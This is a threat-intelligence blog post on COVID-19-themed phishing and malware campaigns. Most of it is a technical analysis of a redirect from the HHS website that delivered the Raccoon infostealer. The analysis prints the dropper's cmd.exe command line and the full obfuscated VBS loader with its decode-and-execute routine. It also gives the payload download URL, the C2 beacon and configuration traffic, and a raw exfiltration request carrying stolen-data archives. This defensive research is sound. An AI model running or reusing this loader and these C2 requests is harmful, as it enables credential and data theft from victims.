COVID-19 Ongoing Cyber Updates

COVID-19 Ongoing Cyber Updates

Cyberint research team closely monitors threats related to COVID-19, leveraging the global fear and uncertainty around it.

Utilizing thematic lures, a variety of cyberattacks have been launched during a time when many are seeking critical information on the outbreak. Exploiting the headline-dominating crisis, individuals, organizations and governments alike are tricked into opening malicious payloads, visiting malicious websites and are subject to misinformation or fraud. Increased remote working patterns, especially for those not accustomed, can lead to increased cyberthreat exposure.

This blog post serves as a collection of threats our research team detects as the COVID-19 crisis unfolds.




COVID-19 Threat Landscape Summary

April 13, 2020

Overview

Cyberint research team is actively tracking the surge in COVID-19 related attacks since January 2020.

Threat actors have been capitalizing on the global attention surrounding COVID-19 global pandemic to lunch phishing campaigns designed to spread malware to unsuspected users and organizations, Cyberint research team published numerous reports and blog-posts describing those campaigns distributing various malware families.

Both eCrime and nation state threat actors are taking part in leveraging COVID-19 to lunch their campaigns primarily focusing on email phishing as a primary attack vector. Out of those malware families we have mapped their TTP's to more than 90 MITRE ATT&CK tactics and techniques. some of the most prevalent malware families used by threat actors during their campaigns include AgentTesla, AZORult, Remcos, Ryuk, CoronaVirus Ransomware, Emotet, NanoCore, AsyncRAT, LokiBot, GuLoader, and more.

Additionally, some of the most targeted countries include USA, UK, Germany, Italy, South Korea, and France.

Details

the first observation of a COVID-19 related phishing campaign we observed was some weeks after China's public announcement of the previously unknown COVID-19 outbreak out of the city of Wuhan, since then we observed a massive uptake in COVID-19 related attacks from both eCrime and nation-state threat actors.

COVID-19_Graph

Figure 1 - COVID-19 Attacks Graph Trend

The chart above shows the increasing trend in COVID-19 related attacks observed since December 2019, and the following uptake in following months.

Malware_Prevelance

Figure 2 - Most Prevalent Malware Related to COVID-19

 

COVID-19 Campaigns Observed During January 2020

During the early January 2020, we observed a phishing campaign leveraging COVID-19 macro-enabled excel attachments, the campaign is attributed to TA505 one of the most active eCrime groups today targeting primarily the financial and retail sectors.

TA505_excel

Figure 3 - malicious excel sheet sent as an attachment by TA505

The macro enabled excel sheet contains an embedded executable that is dropped to disk and loaded to memory, the embedded executable is CobaltStrike beacon DLL loader, and once loaded it enumerate running processes and beacon to its C2 in the following URL https://dysoool[.].com/casemd

This example shows how TA505 immediately shifted focus from their normal operations using generic financial lures and started to leverage COVID-19 global focus to launch their campaigns.

MITRE ATT&CK Techniques Mapping

Techniques Tactics
Spearphishing Attachment - T1193 Initial Access 
Scripting - T1064 Defense Evasion, Execution
Process Discovery - T1057 Discovery
File and Directory Discovery - T1083 Discovery
Standard Application Layer Protocol - T1071 Command and Control 
Standard Cryptographic Protocol - T1032 Command and Control 

Download COVID-19 Threat Landscape Summary Report

The full report includes the following chapters:

COVID-19 Campaigns Observed During February 2020

COVID-19 Campaigns Observed During March 2020

Defending COVID-19 Related Attacks

HHS Website Redirecting to Malicious Files

Mar. 25, 2020


On March 23rd Cyberint research team discovered that the US Health and Human Services (HHS) website (hhs.gov) was redirecting to a malicious infrastructure. 

This infrastructure downloads an information stealer known as Raccoon which is sold as a service at the  underground marketplaces for as low as 75$ per month. Raccoon provides a rich set of features such as login credentials, credit card information, cryptocurrency wallets and browser information from more than 60 different applications.


Cyberint’s initial analysis showed the malware collects the following information from the infected machines:

  • General system information
  • Installed browser passwords
  • Email login credentials
  • Browser saved URLs
  • Cookie information

Cyberint Research executed a detailed in-depth analysis of this issue that you can see below.


Technical Analysis

The infection chain begins from the following URL

https://dcis.hhs.gov/cas/login?service=http%3A%2F%2F195.130.73.229/php/hhs/&gateway=true


The 195.130.73.229/php/hhs URL hosts a Zip document.zip archive.

File name: document.zip

SHA256: 41A857F3EA7ECBEEEF165F6EAC07606DCD8DFE12821CF4012029025496787129

File Size: 4505 bytes

Tags: Archive, Malware

This archive contains a windows lnk file (coronavirus.doc.lnk) masked as an MS Office Word document.

File name: coronavirus.doc.lnk

SHA256: 2414e2fd46a354ccdcf2adeb6fcb838ed5a47b11572571e2e35e4613fe5b2a88

File Size: 18501 bytes

Tags: Dropper, lnk

The file executes an embedded JS code the extracts and drops a VBS file to disk

Windows

System32

cmd.exe

C:\Windows\System32\cmd.exe

%comspec%

desktop-1eq1o8l

HPnVSsPuVlSyVZggUoSyKdoGjtisvEkvAeMmqI = array(82369, 83521, 41616, 77284, 84681, 82944, 81796, 84100, 44521, 85849, 76176, 84100, 84681, 81225, 77284, 44944, 81796, 78961, 87025, 86436, 34225, 35721, 86436, 76729, 83521, 43264, 68121, 86436, 76729, 66564, 80089, 74529, 80656, 78961, 44100, 54289, 43681, 60516, 82944, 74529, 75076, 83521, 76176, 65536, 75625, 79524, 75625, 77841, 85849, 47961, 45369, 70756, 66564, 75625, 84681, 80656, 84100, 83521, 48400, 69169, 79524, 76729, 80656, 81796, 44521, 47089, 36864, 34969, 68121, 77284, 86436, 41616, 59049, 67081, 65536, 44100, 55225, 44944, 60516, 84100, 75625, 72361, 83521, 74529, 64516, 72900, 81796, 74529, 73441, 87616, 46225, 44944, 68644, 73984, 83521, 80089, 85264, 86436, 79524, 80656, 77284, 47524, 61009, 77841, 80656, 77841, 65025, 85849, 85849, 84100, 75076, 79524, 65025, 76176, 81225, 77284, 76729, 87616, 44100, 47961, 34225, 34596, 63504, 72900, 87616, 80656, 42849, 57600, 42436, 69696, 83521, 78400, 65025, 78400, 77284, 79524, 81225, 51076, 58564, 8880

KlsQfgUMVZHRTgtooKZmlxoHqzOtZcsAJjEGgc : next : eval("execute(vnheRuqpQteHohlGdauOFDH)")

gWindows

?System32

cmd.exe

coronavirus.doc$..\..\..\..\Windows\System32\cmd.exe

/v:on /c del qyhRR & if not exist csnJs.txt (set "DJoLj=n" & set "VVdEg=s") & fi!DJoLj!d!VVdEg!tr "HPnVS.*" coronavirus.doc.l!DJoLj!k > "%tmp%\TynhV.vb!VVdEg!" & "%tmp%\TynhV.vb!VVdEg!" & LHumK!%SystemRoot%\system32\SHELL32.dll

%comspec%

S-1-5-21-2757954604-340118960-1547191765-1001


The JS script contains an encoded byte array and - when executed - drops a VBS script to disk named TynhV.vbs to the %temp% directory

File name: TynhV.vbs

SHA256: DF41D7733025128357571FC1C1166F696E83E06EEB39CE6C828031B1994DB957

File Size: 16343 bytes

Tags: Downloader, VBS


HPnVSsPuVlSyVZggUoSyKdoGjtisvEkvAeMmqI = array(82369, 83521, 41616, 77284, 84681, 82944, 81796, 84100, 44521, 85849, 76176, 84100, 84681, 81225, 77284, 44944, 81796, 78961, 87025, 86436, 34225, 35721, 86436, 76729, 83521, 43264, 68121, 86436, 76729, 66564, 80089, 74529, 80656, 78961, 44100, 54289, 43681, 60516, 82944, 74529, 75076, 83521, 76176, 65536, 75625, 79524, 75625, 77841, 85849, 47961, 45369, 70756, 66564, 75625, 84681, 80656, 84100, 83521, 48400, 69169, 79524, 76729, 80656, 81796, 44521, 47089, 36864, 34969, 68121, 77284, 86436, 41616, 59049, 67081, 65536, 44100, 55225, 44944, 60516, 84100, 75625, 72361, 83521, 74529, 64516, 72900, 81796, 74529, 73441, 87616, 46225, 44944, 68644, 73984, 83521, 80089, 85264, 86436, 79524, 80656, 77284, 47524, 61009, 77841, 80656, 77841, 65025, 85849, 85849, 84100, 75076, 79524, 65025, 76176, 81225, 77284, 76729, 87616, 44100, 47961, 34225, 34596, 63504, 72900, 87616, 80656, 42849, 57600, 42436, 69696, 83521, 78400, 65025, 78400, 77284, 79524, 81225, 51076, 58564, 88804, 82944, 76176, 83521, 77841, 60025, 81796, 84681, 79524, 86436, 82944, 79524, 81225, 78961, 84100, 85264, 67600, 86436, 82369, 77841, 82369, 79524, 83521, 45369, 42849, 44944, 67081, 60025, 65536, 65536, 46656, 43264, 48400, 42025, 44100, 44521, 45796, 70225, 60025, 73441, 74529, 76729, 74529, 82369, 80089, 81225, 47961, 83521, 86436, 81225, 43264, 36864, 35344, 85849, 76729, 86436, 43681, 84100, 66564, 81796, 80089, 62500, 78961, 82369, 80656, 42025, 55696, 44521, 67600, 85264, 77841, 67600, 79524, 78961, 81796, 80656, 47961, 58081, 86436, 78961, 75076, 83521, 77284, 68121, 80089, 83521, 82369, 87616, 77284, 87616, 83521, 45369, 67081, 76729, 86436, 77841, 45369, 34225, 33489, 82944, 67081, 85849, 79524, 63001, 77284, 83521, 82369, 50625, 67081, 76176, 82944, 77284, 76729, 87025, 66049, 76176, 85264, 76176, 42436, 55225, 42025, 42849, 80089, 85264, 86436, 83521, 84100, 56644, 49729, 49729, 78961, 72361, 77284, 78400, 77284, 84681, 82944, 80656, 49729, 75076, 81225, 80089, 42436, 36864, 36100, 81225, 69696, 86436, 81225, 65025, 79524, 84100, 80656, 47961, 67081, 76729, 87616, 74529, 46656, 67081, 45369, 36864, 35721, 80656, 77284, 44100, 43264, 46225, 60025, 69169, 63001, 50625, 61504, 79524, 78961, 76729, 58564, 90000, 78961, 86436, 85849, 86436, 45369, 64516, 73984, 85264, 79524, 45796, 46656, 43681, 44521, 67600, 80089, 77841, 81796, 44100, 34225, 34225, 69696, 65536, 75625, 83521, 79524, 80656, 83521, 47524, 60516, 75625, 76176, 82369, 44944, 43264, 59049, 82369, 85849, 82369, 84681, 43681, 45369, 34225, 34596, 75076, 80656, 82369, 74529, 36481, 33856, 59536, 76729, 78961, 42849, 87025, 79524, 79524, 49729, 88209, 84100, 48400, 74529, 74529, 46656, 76176, 80656, 82944, 75625, 80656, 75076, 87616, 78961, 50176, 66564, 65536, 64516, 36481, 33489, 87616, 82369, 79524, 43264, 54289, 41616, 44100, 64009, 67600, 70225, 63001, 65536, 51984, 51076, 69169, 77841, 82944, 84100, 78961, 83521, 71289, 62001, 62500, 60025, 69696, 66564, 64009, 48400, 52441, 50176, 49729, 45796, 34225, 33489, 88804, 85849, 42025, 58081, 41616, 42436, 70756, 69169, 77841, 84100, 80656, 83521, 85264, 48841, 67081, 77841, 78961, 78400, 80656, 44521, 37249, 35344, 76729, 77284, 44521, 55696, 41616, 45796, 56644, 76729, 80656, 76176, 73441, 48400, 67081, 83521, 84100, 78961, 75076, 80089, 44521, 36864, 35344, 65025, 75076, 87025, 42436, 85849, 86436, 77284, 87025, 42436, 55225, 44521, 75076, 85264, 76176, 72361, 83521, 75625, 80089, 73441, 77284, 78400, 76176, 85264, 47961, 87025, 82369, 48841, 37249, 35344, 75625, 78961, 79524, 77841, 80656, 72361, 87616, 78961, 42025, 56169, 44100, 89401, 82369, 79524, 84681, 50625, 59536, 88209, 84681, 73984, 79524, 75625, 62001, 81225, 87616, 81225, 81796, 82944, 82369, 78961, 75625, 82369, 87025, 67600, 83521, 84100, 76729, 79524, 79524, 86436, 46656, 45796, 46656, 65536, 59536, 62001, 64009, 44521, 43264, 47089, 44100, 46656, 42849, 43264, 69696, 60025, 76729, 64516, 62500, 67081, 47961, 75076, 90000, 74529, 42849, 36864, 33856, 70225, 66049, 64009, 42025, 58081, 42849, 42849, 80656, 85264, 84100, 85264, 55696, 49284, 51076, 49284, 54756, 51076, 50625, 54289, 52441, 49284, 49729, 54756, 52441, 49284, 52900, 48841, 50176, 47961, 80089, 85849, 81225, 86436, 51076, 84100, 80656, 82369, 84100, 50176, 76729, 83521, 85849, 80089, 81796, 72900, 48400, 78961, 88209, 75076, 44521, 36481, 34225, 76729, 82944, 73984, 43681, 80089, 78961, 34225, 36100, 36864, 34225, 61009, 73441, 80656, 81225, 42025, 81225, 83521, 82944, 77841, 34596, 34596, 41616, 85264, 87025, 76729, 42849, 81225, 82369, 82944, 78961, 37249, 33489, 42849, 41616, 41616, 41616, 75076, 81225, 81796, 44944, 82369, 82944, 88209, 81796, 82369, 55696, 41616, 67081, 75076, 83521, 43264, 78961, 84681, 90000, 79524, 81225, 43264, 56644, 42849, 73441, 86436, 74529, 75076, 84681, 75076, 83521, 73441, 77841, 78400, 73984, 86436, 46225, 88209, 82944, 82944, 46225, 36100, 33489, 41616, 42849, 43264, 42849, 77284, 81225, 80656, 43681, 87025, 85264, 84100, 76176, 76729, 80089, 56644, 44521, 66049, 75625, 82944, 42025, 87025, 87025, 82369, 77841, 74529, 81225, 44521, 58081, 42849, 73984, 82944, 78961, 73441, 82944, 76729, 82944, 76729, 81225, 77284, 73441, 85849, 47961, 77841, 74529, 46225, 35344, 33489, 44944, 42025, 42025, 42025, 79524, 85264, 89401, 82369, 80656, 49729, 65025, 82944, 78961, 80089, 44521, 44100, 59536, 60025, 69696, 43681, 48841, 41616, 67600, 65025, 62500, 47089, 43681, 61009, 72900, 81796, 83521, 76176, 35721, 36100, 33489, 82944, 82369, 89401, 83521, 79524, 49729, 65536, 77841, 87025, 66564, 78961, 81796, 83521, 78400, 85264, 84100, 60516, 78400, 76729, 75625, 76176, 82944, 43681, 43264, 66049, 82369, 78400, 85264, 47524, 58081, 78961, 74529, 84100, 85264, 44944, 49729, 42849, 42436, 88209, 79524, 69169, 69169, 66564, 67081, 66564, 78961, 64516, 74529, 63001, 87616, 68644, 75076, 64009, 67081, 83521, 64009, 84681, 63504, 71824, 75076, 81796, 45796, 34596, 34969, 35721, 83521, 86436, 87025, 83521, 82369, 50176, 68644, 77841, 84100, 76729, 37249, 34969, 43264, 42849, 42025, 44100, 84681, 81225, 87616, 76176, 44521, 84100, 84681, 85264, 77841, 73441, 81225, 34969, 36100, 42849, 42436, 44100, 44521, 43264, 43264, 48841, 87616, 89401, 82369, 77841, 41616, 55225, 44944, 52441, 36100, 35721, 42849, 43264, 42025, 41616, 42025, 44100, 49284, 82369, 81796, 75076, 81796, 35344, 33856, 44521, 43264, 42436, 42849, 43681, 44944, 48400, 88209, 83521, 79524, 85849, 76176, 44944, 82369, 84681, 88804, 79524, 80089, 50625, 82369, 78961, 84681, 81796, 84681, 83521, 82369, 75076, 57121, 84681, 76729, 90000, 36481, 34969, 43681, 44100, 41616, 44100, 43681, 42849, 51076, 85849, 75625, 86436, 78400, 85264, 81796, 77841, 76729, 82944, 77284, 42436, 78400, 77841, 82369, 75076, 80656, 76729, 85849, 76729, 47961, 42025, 51529, 36481, 34969, 33489, 75625, 81796, 77841, 42025, 86436, 78400, 87616, 80656, 34969, 33124, 42436, 87616, 86436, 76176, 85849, 50625, 60025, 85849, 76176, 75625, 46656, 75076, 78400, 82944, 75076, 81796, 72900, 87616, 76176, 47961, 36864, 34225, 43681, 77284, 82944, 74529, 44521, 84681, 85849, 76176, 34969, 33856, 44944, 87025, 84681, 76729, 85264, 50176, 63504, 81225, 82369, 87616, 81225, 42849, 44521, 59049, 85264, 85264, 83521, 84681, 54756, 42025, 58564, 80656, 81225, 74529, 42025, 80656, 84681, 42849, 74529, 85264, 84681, 78400, 78961, 79524, 44944, 48400, 42436, 48400, 47524, 44100, 42849, 63504, 77841, 76176, 84681, 83521, 84100, 80089, 76729, 82944, 42436, 68644, 84681, 81796, 75625, 44521, 48400, 42849, 51984, 42436, 47524, 44100, 50625, 54289, 36864, 35344, 59536, 66049, 66049, 49729, 60025, 75076, 87025, 60025, 78400, 78400, 75076, 47961, 67600, 66564, 75625, 85264, 77284, 84681, 85264, 50625, 68644, 73984, 85849, 81225, 83521, 85849, 60025, 84100, 82944, 80089, 65536, 75076, 81796, 78961, 47524, 51076, 78400, 77284, 81796, 78961, 87616, 74529) : OJMhpzXnKwXfkgPUpscbIpxCMQQMHLeuPvLiMOv = array(30976, 32041, 29584, 31329, 31329, 30276, 30625, 30976, 32041, 32041, 30625, 30625, 30276, 30976, 31329, 32400, 30976, 32400, 30625, 31684, 29584, 32041, 32041, 30976, 29929, 30976, 30276, 32041, 29929, 30625, 32041, 29584, 30976, 29929, 31684, 29584, 31329, 32041, 30276, 29584, 31329, 29929, 30625, 31329, 31329, 30976, 30276, 32400, 31329, 32041, 32041, 32041, 30625, 30976, 31329, 32041, 31684, 29929, 30276, 32400, 31684, 30976, 30976, 31684, 31329, 30976, 32041, 31329, 31684, 31329, 31684, 29584, 29929, 30976, 31329, 31684, 30276, 32400, 32041, 30976, 30276, 29584, 29929, 29584, 30625, 29584, 32400, 29584, 29584, 32400, 30625, 31684, 32041, 29929, 30625, 31684, 32400, 31684, 31329, 30276, 30625, 29584, 31329, 30276, 30976, 31684, 29584, 29584, 31684, 30276, 29929, 29929, 30976, 31684, 32041, 31329, 31684, 32400, 30976, 31684, 29584, 30976, 29584, 29929, 32400, 32400, 30625, 32041, 30276, 31329, 30276, 30976, 29584, 30976, 31329, 30276, 31329, 32400, 29929, 31684, 30976, 32041, 32041, 32041, 30976, 30976, 29929, 31329, 32400, 31329, 29584, 30976, 32400, 32400, 30976, 31329, 31684, 29929, 30276, 31329, 32041, 30276, 29929, 29929, 30625, 30625, 30976, 32041, 30976, 32041, 30276, 32041, 29929, 29584, 32041, 32400, 29929, 30625, 30276, 30276, 30976, 30625, 30976, 29584, 31684, 29929, 29584, 32400, 31329, 30276, 32041, 31684, 31684, 30976, 31684, 31329, 32041, 29929, 29584, 30625, 30276, 30976, 31329, 31329, 29929, 30625, 32041, 29929, 31329, 30625, 31329, 31684, 32400, 31684, 30976, 29929, 30276, 32400, 32400, 31329, 29929, 31329, 31684, 32041, 31684, 29929, 32400, 32041, 32041, 29929, 29929, 32041, 32400, 31684, 30625, 29584, 29584, 29929, 31329, 30276, 32041, 30276, 30625, 29929, 32041, 32400, 32041, 30625, 32041, 30276, 30625, 30976, 32041, 31329, 32041, 30976, 29584, 30276, 30276, 29929, 29929, 32041, 30976, 31684, 31329, 30625, 32400, 30976, 30976, 32041, 29584, 32041, 32041, 32400, 32400, 31329, 31329, 31329, 30625, 30276, 30276, 29584, 32041, 32400, 30276, 32041, 32400, 31329, 32041, 31329, 32400, 31329, 29929, 30976, 32400, 31684, 29584, 30976, 30976, 29584, 32041, 32041, 32041, 30976, 31684, 30976, 30625, 30625, 32400, 29584, 32041, 31684, 31329, 29929, 30976, 29929, 32400, 30976, 32041, 31329, 32041, 29929, 30276, 30625, 30976, 31684, 29929, 30625, 31329, 32041, 30976, 32041, 31684, 30976, 31684, 29584, 30625, 31329, 29929, 30976, 30625, 31329, 29584, 29929, 29584, 31329, 30976, 29584, 30976, 32400, 30276, 30276, 29929, 32041, 30976, 31329, 30976, 32041, 29584, 30976, 29929, 30976, 29584, 29584, 31684, 30276, 30976, 29584, 29584, 30625, 30625, 29929, 30276, 32041, 31684, 30625, 30976, 29929, 30625, 29584, 30276, 32041, 32400, 30276, 29584, 31329, 32400, 31329, 32400, 29929, 30276, 31684, 31684, 29929, 30976, 31684, 30276, 30976, 29584, 29584, 30976, 30976, 31329, 31329, 30276, 32400, 31684, 32400, 32400, 31684, 30276, 29584, 32400, 30625, 32041, 29584, 30276, 29929, 32400, 30276, 29929, 30276, 31684, 31684, 30625, 32400, 29584, 29929, 32041, 31684, 29929, 32400, 29584, 29584, 32041, 32400, 32400, 30976, 32041, 31329, 30976, 30625, 30976, 30625, 32400, 29584, 30976, 31329, 32400, 31684, 31329, 32400, 32041, 30625, 29584, 32400, 29929, 31329, 29929, 30976, 29929, 30276, 30976, 29929, 30976, 32400, 31329, 30276, 31329, 32041, 31684, 29584, 29929, 32041, 30276, 30276, 32041, 30276, 32400, 30276, 30276, 32041, 30625, 31684, 30625, 29584, 29929, 30276, 29584, 29929, 29584, 32041, 31329, 30976, 32041, 30976, 29584, 32400, 32400, 31684, 29929, 30976, 30276, 31684, 29584, 29584, 32400, 31329, 29929, 30976, 31684, 32400, 29584, 31684, 30976, 32041, 30625, 31329, 32041, 30625, 29584, 30625, 32400, 30625, 31684, 32400, 29584, 31329, 31329, 29584, 30276, 31329, 32041, 31329, 29929, 30976, 29584, 29584, 32041, 32041, 30976, 32400, 32041, 29584, 30625, 29584, 29929, 30276, 30276, 30976, 31684, 31684, 30625, 30276, 29584, 29929, 29929, 32041, 32400, 29584, 29929, 29929, 32400, 29584, 29929, 32041, 30276, 32400, 30625, 31329, 29929, 32400, 30625, 29929, 32400, 30976, 30276, 32400, 31684, 30625, 32041, 29929, 31684, 29929, 32041, 32041, 32041, 30976, 30276, 31684, 29929, 30976, 32400, 29929, 29584, 29584, 32041, 30976, 30625, 31684, 32041, 31684, 29929, 29584, 30276, 31329, 31684, 31684, 32041, 29584, 30976, 29929, 30276, 32400, 31329, 29929, 31329, 31684, 30625, 30976, 31684, 29584, 31329, 31684, 32041, 29584, 32400, 32041, 30625, 32400, 30276, 30976, 31329, 29929, 29929, 30625, 31329, 30976, 29929, 30976, 29584, 31329, 31684, 32041, 30625, 29929, 29929, 31329, 31684, 32400, 29929, 30625, 29584, 29584, 29584, 30276, 32400, 31329, 32400, 31684, 29929, 31329, 31329, 32041, 31684, 29584, 30976, 29929, 29929, 30976, 29584, 30976, 32400, 29929, 31329, 30976, 31329, 30625, 29584, 32400, 29584, 31329, 30625, 29929, 31684, 29929, 29929, 32041, 29929, 31684, 30625, 31329, 32041, 32400, 30276, 31329, 29929, 29584, 30625, 30976, 30625, 31684, 32400, 30625, 31329, 32400, 30976, 30976, 30625, 32400, 30276, 32400, 32041, 30276, 30276, 29584, 29929, 32400, 32041, 29929, 31684, 30976, 30976, 32041, 32400, 30625, 29929, 30276, 32400, 30276, 29584, 30976, 31329, 32041, 32041, 31329, 29584, 31329, 32041, 32041, 30625, 30276, 30625, 29929, 32400, 29929, 29929, 29929, 29929, 31329, 32041, 31684, 30976, 31329, 30976, 30976, 32400, 29929, 32041, 30976, 29929, 30976, 32400, 30625, 31329, 29584, 30625, 29929, 30276, 29929, 31329, 31329, 29929, 31684, 30276, 30625, 30976, 32400, 30276, 32041, 29584, 32041, 32400, 30276, 31329, 29929, 31684, 32041, 30976, 32400, 29929, 29584, 32041, 31329, 30276, 30276, 32041, 32400, 30625, 30625, 30276, 31329, 30276, 29584, 29584, 32041, 31684, 29929, 30976, 31684, 29584, 32400, 30976, 31684, 32041, 30625, 29584, 32041, 30625, 32041, 32400, 32400, 32400, 31329, 32400, 31329, 30276, 30276, 32041, 31684, 31329, 29929, 29584, 31329, 29584, 30625, 31684, 32041, 30976, 30276, 32400, 29929, 31329, 32400, 32400, 32041, 30625, 32400, 32041, 31684, 32041, 31684, 32400, 31329, 32400, 31329, 30976, 30625, 29929, 31684, 29584, 32400, 32400, 29584, 32041, 30625, 30625, 31684, 31684, 30276, 30976, 30276, 32400, 30625, 30276, 31684, 32041, 30976, 30976, 30625, 32400, 31684, 30625, 31684, 29584, 30276, 32400, 32400, 31329, 32041, 30625, 30976, 29929, 29584, 29929, 31684, 30976, 30976, 30276, 29929, 30976, 30625, 30276, 32041, 30976, 30276, 30625, 31329, 32400, 30276, 31684, 30625, 31329, 31329, 30625, 32400, 31684, 30976, 31684, 29929, 30625, 32041, 29929, 32400, 30976, 30276, 32400, 32041, 29584, 29929, 29929, 32400, 31329, 32041, 31684, 31329, 31329, 31684, 29584, 31684, 31329, 30625, 32400, 31684, 31684, 30976, 32041, 30976, 30625, 31329, 29584, 32400, 31329, 30276, 31684, 30276, 32041, 29929, 29584, 32400, 31329, 29929, 30625, 29929, 31329, 31684, 31329, 30276, 30276, 30976, 32041, 29929, 30625, 30625, 32400, 32400, 30276, 29584, 30276, 31329, 32041, 29584, 31684, 32041, 30976, 29929, 30625, 30976, 30976, 29584, 30625, 32400, 29929, 30276, 29929, 32400, 29584, 31684, 32041, 30625, 31329, 31329, 31684, 29929, 32041, 30976, 30976, 31684, 30276, 30276, 32400, 30976, 30976, 29929, 31329, 31684, 29584, 30276, 30625, 32041, 29929, 30625, 31329, 30276, 31684, 31684, 31684, 31329, 30976, 29929, 29584, 32041, 31329, 29584, 29929, 32041, 30976, 30625, 30625, 31684, 32400, 29929, 32400, 29584, 31684, 30976, 30276, 29584, 30276, 31684, 29929, 30625, 30276, 31329, 31329, 31684, 30625, 29584, 30625, 29584, 30276, 30625, 32400, 29584, 30625, 31329, 30976, 30625, 32400, 30276, 30625, 31684, 29929, 31329, 32041, 31684, 30276, 30276, 31684, 31329, 30276, 29929, 32041, 30625, 30625, 29584, 29929, 32041, 29929, 30625, 30976, 31684, 29929, 32041, 30976, 32041, 32041, 29929, 32041, 32400, 31329, 31329, 30625, 29929, 32400, 30625, 31684, 31329, 31329, 32400, 31329, 32400, 32400, 31329, 31684, 32400, 32400, 29584) : for naTBSFYEGvJQdHnQlsCHOHkXxrCTksLIwuwanjp = lbound(HPnVSsPuVlSyVZggUoSyKdoGjtisvEkvAeMmqI) to ubound(OJMhpzXnKwXfkgPUpscbIpxCMQQMHLeuPvLiMOv) : CPPFTOKSLLcZgwVEXzmeCFEkBmwCaySWTjRG = sqr(HPnVSsPuVlSyVZggUoSyKdoGjtisvEkvAeMmqI(naTBSFYEGvJQdHnQlsCHOHkXxrCTksLIwuwanjp)) - sqr(OJMhpzXnKwXfkgPUpscbIpxCMQQMHLeuPvLiMOv(naTBSFYEGvJQdHnQlsCHOHkXxrCTksLIwuwanjp)) : KlsQfgUMVZHRTgtooKZmlxoHqzOtZcsAJjEGgc = chr(CPPFTOKSLLcZgwVEXzmeCFEkBmwCaySWTjRG) : vnheRuqpQteHohlGdauOFDH = vnheRuqpQteHohlGdauOFDH & KlsQfgUMVZHRTgtooKZmlxoHqzOtZcsAJjEGgc : next : eval("execute(vnheRuqpQteHohlGdauOFDH)")


TynhV.vbs is heavily obfuscated and contains two byte arrays, the decoding routine decodes the two arrays which result in binary code to the following URL

http://185.62.188.204/hunt/post/corona.exe


corona.exe is a Raccoon payload executed from the %temp% directory.

The payload drops another file called svchost.exe in the same directory, svchost is a legitimate and signed by Microsoft vbc.exe. The raccoon payload starts the svchost.exe in a suspended state and injects code into svchost.exe, and resumes execution.


File name: corona.exe

SHA256: 417871EE18A4C782DF7AE9B7A64CA060547F7C88A4A405B2FA2487940EAA3C31

File Size: 734208 bytes

Tags: Dropper, Raccoon

File name: svhost.exe

SHA256: D4CB7377E8275ED47E499AB0D7EE47167829A5931BA41AA5790593595A7E1061

File Size: 2688096 bytes

Tags: Injected, Raccoon,Signed

http://35.228.60.178/gate/log.php

using an HTTP POST request and a base64 encoded parameters the decoded value is

bot_id=90059C37-1320-41A4-B58D-2B75A9850D2F_admin&config_id=1100ffd1149d14257ac9c4b7df1ceb7c1777d166&data=null


bot_id is the infected machine GUID. config_id is the configuration id for the malware. 

The received response is the following json format response

{"url":"http://35.228.60.178/file_handler/file.php?hash=ada9815aff61f6145a584e38e724a70ac4ac967c&js=8eef2fb5d253751408287c2add27cfc10dc2821a&callback=http://35.228.60.178/gate","attachment_url":"http://35.228.60.178/gate/sqlite3.dll","libraries":"http://35.228.60.178/gate/libs.zip","ip":"185.183.107.236","config":{"masks":null,"loader_urls":null},"is_screen_enabled":0,"is_history_enabled":0,"depth":3}


That json file contains information that the malware needs to execute its tasks. 

The malware downloads legitimate files from the C2 server like sqlite3.dll and libs.zip containing more auxiliary files the malware uses to steal information from the infected machine.

The malware then collects the following information from the infected machine

  • General system information
  • Installed browser passwords
  • Email login information
  • Browser saved URLs
  • Cookie information

Raccoon then exfiltrates the information using the following POST request

http://35.228.60.178/file_handler/file.php?hash=ada9815aff61f6145a584e38e724a70ac4ac967c&js=8eef2fb5d253751408287c2add27cfc10dc2821a&callback=http://35.228.60.178/gate

file.php is an archive containing the above mentioned data collected by Raccoon sends it back to its C2 server.

À3cp‹õ´B

--Jfbvjwj3489078yuyetu

content-disposition: form-data; name="file"; filename="data.zip"

Content-Type: application/octet-stream


PK   @µxPöÎj=o   ª passwords.txtUT ¸Œz^±Œz^±Œz^öw±RpÏÏOÏIUpÎ(ÊÏMÕpIMK,Í)ÑäåòðÊf””[éëçê¥%&§&åçgë%ççêór…»¥óóR+

òK@¢¼\ŽÁÁPÁ‚ÄâbcS3^.^®`°=n™E©iù0ƒI2 PK   @µxPáü÷· browsers/firefox_urls.txtUT ¸Œz^¸Œz^¸Œz^ÏK‚0€á= wàÒ–>hIŒ·¬4€(hlI[¨zzÁ×v7™äÿ¦Å.Ï¢³s­Í ðÞÇ}—MSÆÚœ@kd_n –¦ªõ„ÁVwÊe

ƒ¼´.꥕ãH1%”@È8_„Añ+\©U±_žOÂóóŸ,C1Œ“q´Îtjƒ—üâËÐ'ãÏ¥³ªò`£›c_+µZ¿N˜†é(2,¸À|ˆ£ 8vdf„p1,yÃPK   *µxPv P% ,   browsers/chrome_autofill.txtUT ±Œz^±Œz^±Œz^sË,*.ñKÌMåårOL*ÊLÍáåâåòI„ %¦e¦çƒDPK   JµxP›ÌGMN |     mails/outlook.txtUT ½Œz^½Œz^½Œz^ö PN-*K-²2´4Ò34³Ð3Ô3äå

ð0Æ*áš›˜™c•‘Ÿ—ZéP_¢—œŸUZT‹M" ±¸¸<¿("Y 䛚ñr PK   JµxPžt¶f L System Info.txtUT ½Œz^½Œz^½Œz^Sï‹Û8ý|üó튅,ÿ6,œ×Ù¤)›4u’ÞÑã(Z[›ˆu$c˹Ýþõ7J6Ki)œýAxÞ›ñÓÌ›¿K^UZ+ØÁÑý.œ<JÑÞ‹ñèvM•>¶²5 y{`&€Åàù£Y࣌ŽG÷|PÕYÜdç¡>aVe,XFC˜/·XS›¯‹i)¥aZø±ëùŒº—îm˜L]v‡yš„tÊf_y}”j<*¥¤Ú[jÑ?ÝŽGãÑMy“ßø~ÄwucC›—Þˆ#,Ô£îŽÜH­2Ôñ

